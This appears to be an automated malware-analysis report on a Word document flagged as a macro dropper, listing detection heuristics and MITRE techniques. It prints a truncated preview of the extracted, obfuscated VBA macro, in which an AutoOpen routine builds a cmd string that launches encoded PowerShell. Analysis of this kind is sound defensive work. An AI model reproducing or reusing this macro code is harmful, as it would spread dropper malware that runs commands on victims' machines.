MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6574760-0' suggests it acts as a dropper for other malware. The VBA code appears to be obfuscated, but the presence of the Shell() call is a strong indicator of malicious intent to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6574783-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6574783-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11214 bytes |
SHA-256: 651f622a4d7eba5d4017d4b674a0229d0d28a1efc4699eecc00c25b8ac8c3210 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CswGkYsKwrLu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lpRBt() On Error Resume Next StDRTI = Hex(imucun + Hex(ZjMbZJ) * 6048 + Round(OrtJLa)) KiKXuv = Cos(MMQMDz) fXujY = CDate(NiwvJ) SiMYJw = Cos(zbQRW) jiTAKN = Hex(DkjUw + Hex(nTQbhO) * 27631 + Round(cMAoH)) CAnPF = Cos(noYui) hDjivs = CDate(fJhiz) DHkGVS = Cos(DwCCz) lpRBt = jHcXvUYJT + Shell(LkGvlPjKRD + Chr(FrbcFvJcT + vbKeyC + BzSPs) + kRFcWjREja + USLATvI + RFfJWLEYVXU + hwPlNiwOCl + idtorAIKbu + lNMkvt, 36552 - 36552) Oaqwu = Hex(tvhKZ + Hex(QIObGV) * 34322 + Round(hCQCiD)) VijBjk = Cos(dzpKmM) nVzKL = CDate(Kwcrh) JmMJnP = Cos(uXMzJt) End Function Sub Autoopen() On Error Resume Next ofOlw = Hex(FitjTr + Hex(wRXGr) * 38461 + Round(bqQqCu)) RiaYoR = Cos(Pijqv) fbsfqv = CDate(sdAGFp) iwOYjB = Cos(nASIfa) lpRBt imnQv = Hex(QAzlA + Hex(CCohU) * 35153 + Round(UTRQLG)) KsaZXL = Cos(VJqMq) ThhBd = CDate(dzlwS) pjFDRV = Cos(JBLYZX) End Sub Attribute VB_Name = "oljswViIf" Function kRFcWjREja() On Error Resume Next BEEGwI = Hex(XBUkw + Hex(InJFS) * 56861 + Round(taicL)) TuJqnj = Cos(LIrji) aDiim = CDate(ozZwP) lBlra = Cos(cuAoIN) RiVhCYoJ = "md LmRYs" + "pB oqnpH" + "wQNicAhGYOPqCS" + "Dlq ztvmkR" + "qbndNj & " + " %^c^o" jEtzz = Hex(caNDNO + Hex(rGWwtw) * 88019 + Round(BfRTi)) EjEmu = Cos(TFRvA) AnwXwX = CDate(iiVXDu) TuiZb = Cos(RiXrJR) QiFaPqPYD = "^m^S^p^E^c^% " + " " + " " + "%^c^o^m^S^p^E^" + "c^% " + "/V " + " " + " /c " + " set %GMZ" zdmob = Hex(TzGSdj + Hex(rDiiLA) * 84224 + Round(zYasUU)) VPHOj = Cos(iBwjw) aNNcA = CDate(hoNwpf) ZjAEL = Cos(HbLcrK) LPhRwz = "wfkkVT" + "iXENDJ%" + "=m" + "jZD" + "ABp&&s" + "et %YYwKfvi" ApMCm = Hex(PsRWj + Hex(ZzmjuZ) * 50408 + Round(EHViwk)) pfPkWR = Cos(ssbLKn) QIMQI = CDate(wUvQCQ) KsTiFB = Cos(aNBlN) RBziOVF = "tGhzo%=p&&set" + " %" + "nNpAolWfwkjR" + "%=o^w&&se" + "t %NCidR" oHuEjP = Hex(MozIOo + Hex(oUjwhF) * 68263 + Round(zYtFIV)) DGbCiz = Cos(arhndW) tKURC = CDate(FdCDIu) HVLdG = Cos(WkshL) cFwFCMdT = "lZoE" + "spHC" + "RD%=SA" + "USUWqZjHoo&&s" + "et %zr" + "crbJbiADFkv" + "F%=!%YYwKfvi" + "tGhzo%!&&set" + " %D" + "DKiFWLwBHSkuqS" CzusR = Hex(bNDGOZ + Hex(GsjZDX) * 88220 + Round(jjEjDh)) zlAdI = Cos(zdLll) hhJBH = CDate(pzYnLp) RZSSq = Cos(OMOOS) VEuYKSVHqJb = "%=XvGk" + "jzHC&&s" + "et %SwVIAwzjbsT" + "cj%=e^r&&set" + " %wnClNrJ" + "kXsUl" + "Z%=!%nNpAolWfwk" + "jR%!&&se" kQjGP = Hex(nSNMC + Hex(fwuOh) * 77762 + Round(aKSqh)) KVZWwS = Cos(rvWVI) IPXXwF = CDate(tntRz) aCrvSa = Cos(ZFCOvQ) dFsAUKaCsuF = "t %ZTljkDuVFt" + "QY%=s&&" + "set %fiVrLE" + "wJwl" + "kAiGC%=" + "GHlKikYiDiB&&se" + "t %WCboOsocl" + "Xwhz%=he&&" + "se" jhjaYG = Hex(fvCnVl + Hex(nWcHX) * 33506 + Round(QzAEvI)) DNJbj = Cos(nLETt) quGpHw = CDate(pmiaGY) AShjVd = Cos(VcitMp) EUjdhXwwE = "t %DLUWXE" + "DwMLAzO" + "%=ll&&!%zrc" + "rbJbiAD" + "FkvF" + "%!" WbSJO = Hex(awKKtI + Hex(ThUmC) * 6763 + Round(KUdVzP)) VRXvuG = Cos(SKQRs) YCIXpN = CDate(doIwr) JOBwz = Cos(zjFjm) jqLRA = "!%wn" + "ClNrJ" + "kXsUlZ%!!%" + "SwVIAwzjbsTc" + "j%!!" wBqBX = Hex(VJJII + Hex(GfkrR) * 63365 + Round(bDmzA)) MTFtK = Cos(VWHrL) cREaiw = CDate(FprRb) RYXKL = Cos(EqjKk) YGkSP = "%ZTljkDuV" + "FtQY%!!%WCbo" + "OsoclXw" + "hz%!!%DLUW" + "XEDwMLAz" + "O%! -e KAAgAG4" kRFcWjREja = RiVhCYoJ + QiFaPqPYD + LPhRwz + RBziOVF + cFwFCMdT + VEuYKSVHqJb + dFsAUKaCsuF + EUjdhXwwE + jqLRA + YGkSP End Function Function USLATvI() On Error Resume Next Qzonp = Hex(oYKpPE + Hex(Vnwub) * 39784 + Round(dltuz)) vfGqs = Cos(UJRzM) AsdCz = CDate(ISJqZI) HqimiG = Cos(pdDJST) zGoCjBiw = "AR" + "QBXAC0ATwBiAEoA" + "RQ" + "BjAHQAI" JkrDnj = Hex(bcYaoQ + Hex(fCFFzv) * 70987 + Round(mWntS)) WpUkdj = Cos(iSmlYS) NJMqpH = CDate(bzDUX) tzUQu = Cos(zEnDp) ratnfCGwj = "AAgAFMAWQBzAH" + "QARQBtA" + "C4ASQBPAC4AUw" + "BUAFIARQBh" + "AE0AUgBFAGEAZA" + "BFAF" kmw ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.